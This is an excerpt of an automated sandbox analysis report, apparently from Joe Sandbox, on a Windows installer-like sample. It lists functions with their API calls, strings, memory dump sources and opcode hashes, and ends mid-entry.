                                                                                                                                                                                                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                              Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                              • String ID: %02x%c$...
                                                                                                                                                                                                                                                                              • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                              Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                              • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                              Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                              Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                              • String ID: Version
                                                                                                                                                                                                                                                                              • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                              Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                              Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                              Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                              Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                              • String ID: !N~
                                                                                                                                                                                                                                                                              • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                              Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                              Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
